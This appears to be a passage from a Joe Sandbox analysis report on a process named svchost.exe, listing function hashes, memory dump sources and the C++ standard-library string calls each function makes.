      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??4?$basic_string@V01@
      • String ID:
      • API String ID: 1734405261-619786877
      • Opcode ID: 07daa531163dec9c8f9aae745856e4a5a2ae6627b13409d51c809af7b0c55b23
      • Instruction ID: e21da36281f96aeac4e853011d67c8e5b5b5f63b5054052cbc7cbb15fb94844e
      • Opcode Fuzzy Hash: 07daa531163dec9c8f9aae745856e4a5a2ae6627b13409d51c809af7b0c55b23
      • Instruction Fuzzy Hash: BE316F70185780DED308DF58EE49B2A7F93E754754F04610CF26D5B2E2CB745988CB22
      APIs
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90 ref: 006736E2
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(00000000,00000001), ref: 006736FB
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(00000000), ref: 00673706
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00673717
      • atoi.MSVCR90(00000000), ref: 0067371E
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673732
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673744
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673756
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@?erase@?$basic_string@?find@?$basic_string@A?$basic_string@V01@@V12@atoi
      • String ID:
      • API String ID: 1924340847-0
      • Opcode ID: 854a296480e036e77eae4c2837e8d3b5bc0557c827a8f2020c443203465a377a
      • Instruction ID: 4f35a771f70b7ac2cae9211a63ce3930bf90a9ffb994c677df8efb226b88d396
      • Opcode Fuzzy Hash: 854a296480e036e77eae4c2837e8d3b5bc0557c827a8f2020c443203465a377a
      • Instruction Fuzzy Hash: 6E214F711187409FD348DF24D949B5ABBE6FB48724F505A1CF46B832E0DB709588CB52
      APIs
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(26DFE5F7,?,?,0067573E,000000FF), ref: 006711B6
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(00679008,0000001C,00000064,6E6B5EBB,00679AF8,0000001C,00000064,6E6B5EBB,0067A5E8,0000001C,00000064,6E6B5EBB,?,?,0067573E,000000FF), ref: 00671213
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,0067573E,000000FF), ref: 00671223
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,0067573E,000000FF), ref: 00671233
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,0067573E,000000FF), ref: 00671246
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
      • String ID:
      • API String ID: 2599707790-0
      • Opcode ID: cc86b25533abe7b63f9f2a9732107ebb3eb1952b5ed88d75bfccfc95032b673b
      • Instruction ID: d8dc9fd92dd5329d82311df09a86a196d54b0e71461770863f4067b36ee6ff1f
      • Opcode Fuzzy Hash: cc86b25533abe7b63f9f2a9732107ebb3eb1952b5ed88d75bfccfc95032b673b
      • Instruction Fuzzy Hash: C7110D702887819FE314DF64C909B2A7F97FB85718F049A0CF6AE4B3D1CBB559448B62
      APIs
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90 ref: 00673632
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(00000000,00000001), ref: 0067364B
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(00000001), ref: 00673658
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(00676226), ref: 00673667
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067367E
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@?erase@?$basic_string@?find@?$basic_string@V01@@V12@
      • String ID:
      • API String ID: 1645203866-0
      • Opcode ID: ba4ed0dae86490f4ecfaa2a587851660c322285cd1e8953bb6d325d08bfe19b6
      • Instruction ID: 56f911745f31d272a51bd61228378bb35edc96078b7706996b4d4cc1d643c09c
      • Opcode Fuzzy Hash: ba4ed0dae86490f4ecfaa2a587851660c322285cd1e8953bb6d325d08bfe19b6
      • Instruction Fuzzy Hash: 73115B70218B01AFD308CF14DA49B5ABBE6FB88B08F40891DF45E82290DB749A49CB52
      APIs
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(006767F8,00000000,26DFE5F7,00000000,00675699,000000FF,00674921), ref: 00673593
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000001), ref: 0067359F
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006735B6
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006735CE
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?find@?$basic_string@A?$basic_string@
      • String ID:
      • API String ID: 3537960175-0
      • Opcode ID: b332bf2382da389d797507e7cc8c7bead75e0f16fb089898eedff633845bfde5
      • Instruction ID: f097d236f88164046db5748efa0a8483d088ebba8d8ded9a4293710486d6e03a
      • Opcode Fuzzy Hash: b332bf2382da389d797507e7cc8c7bead75e0f16fb089898eedff633845bfde5
      • Instruction Fuzzy Hash: 38016D75148B41EFD319CF10E945BA6BBE5FB44B24F408A1DF86A833D0DB386909CE12
      APIs
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,00672A9E,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671267
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067127B
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671288
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067129C
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?erase@?$basic_string@A?$basic_string@V12@
      • String ID:
      • API String ID: 2190450286-0
      • Opcode ID: fa93ef78d61d64ccf72e1ea9c45cc9b6814993184e7e7f75f1b9dda328232232
      • Instruction ID: c35aa7d35afb36ee549a630c16142986ea6d2514db1d53bd0ee38f8990fec35c
      • Opcode Fuzzy Hash: fa93ef78d61d64ccf72e1ea9c45cc9b6814993184e7e7f75f1b9dda328232232
      • Instruction Fuzzy Hash: 9CF0C970704E009FEB69DB18EA58B3E77A7EB45B00F001548F44EC72A1CB64AD848B65